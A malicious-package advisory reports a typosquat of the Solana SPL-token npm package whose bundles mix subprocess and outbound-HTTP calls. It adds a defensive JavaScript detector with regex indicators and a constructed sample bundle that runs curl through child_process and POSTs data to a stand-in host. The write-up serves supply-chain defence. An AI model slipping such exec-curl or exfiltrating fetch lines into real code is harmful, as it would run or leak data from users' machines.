
MAL-2026-5787

Malicious code in @solana-labs/spl-toke (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (490ce5d7e43d8a79aa85bbd24e7140ed074eee472f375092ab9b4cd650ce41f8)

Package name `@solana-labs/spl-toke` is a one-character omission of the legitimate `@solana-labs/spl-token` package, abusing the official Solana Labs scope-and-name shape to confuse installers. The bundled outputs at lib/index.cjs.js and lib/index.esm.js contain repeated co-occurrences of `require('child_process')`, `curl` invocations, `fetch(` calls, and `POST` request shapes spread across many lines (e.g. cjs lines 11441, 11466, 11479, 11495, 11535 for child_process; lines 11441, 11495, 11535, 11589, 11629 for curl; lines 5041/5046, 11464, 11558, 11652 for fetch+POST). The combination of (a) a clear typosquat against a top-tier blockchain SDK namespace and (b) bundled subprocess + outbound HTTP primitives in a package that purports to be a thin SPL-token client matches the supply-chain dropper/exfil shape and should not be allowed to install on developer or build machines.
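An added example (not code from the advisory or from Amazon Inspector) that applies the report's two signals as a local pre-install check: a one-character-omission match against an allowlist of known package names, and a per-line scan of a bundled file for the co-occurring subprocess and outbound-HTTP primitives the report lists. The allowlist and the sample bundle text are constructed for the demo.

```javascript
// Added example (not from the advisory): the two signals the report combines,
// (a) one-character omission of a known name, (b) subprocess + outbound-HTTP
// primitives co-occurring in a bundle. Allowlist and sample bundle are constructed.
const KNOWN_PACKAGES = ['@solana-labs/spl-token', '@solana/web3.js'];

// True when `candidate` is `legit` with exactly one character deleted.
function isOneCharOmission(candidate, legit) {
  if (candidate.length !== legit.length - 1) return false;
  let i = 0;
  while (i < candidate.length && candidate[i] === legit[i]) i++;
  return candidate.slice(i) === legit.slice(i + 1);
}

// Legitimate name a candidate appears to shadow, or null (exact matches are fine).
function findTyposquatTarget(candidate, known = KNOWN_PACKAGES) {
  if (known.includes(candidate)) return null;
  return known.find((legit) => isOneCharOmission(candidate, legit)) || null;
}

// Line numbers (1-based) on which each primitive from the report appears.
const INDICATORS = {
  child_process: /require\(\s*['"]child_process['"]\s*\)/,
  curl: /\bcurl\b/,
  fetch: /\bfetch\(/,
  post: /\bPOST\b/,
};
function scanBundle(source) {
  const hits = Object.fromEntries(Object.keys(INDICATORS).map((k) => [k, []]));
  source.split('\n').forEach((line, idx) => {
    for (const [name, re] of Object.entries(INDICATORS)) {
      if (re.test(line)) hits[name].push(idx + 1);
    }
  });
  return hits;
}

// Suspicious only when the typosquat AND both primitive classes are present.
function assess(packageName, bundleSource) {
  const target = findTyposquatTarget(packageName);
  const hits = scanBundle(bundleSource);
  const subprocess = hits.child_process.length > 0;
  const outbound = hits.curl.length + hits.fetch.length + hits.post.length > 0;
  return { target, hits, suspicious: target !== null && subprocess && outbound };
}
// Constructed sample bundle text, not the real package's contents.
const SAMPLE_BUNDLE = [
  "const cp = require('child_process');",
  "cp.exec('curl -s https://example.invalid/c');",
  "fetch('https://example.invalid/u', { method: 'POST', body: d });",
].join('\n');
```

Running `assess('@solana-labs/spl-toke', SAMPLE_BUNDLE)` flags the sample, while the legitimate name with the same bundle does not, because the typosquat signal is required alongside the primitives.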


Affected packages

npm / @solana-labs/spl-toke

No fixed version published yet for @solana-labs/spl-toke (npm). Pin to a known-safe version or switch to an alternative.
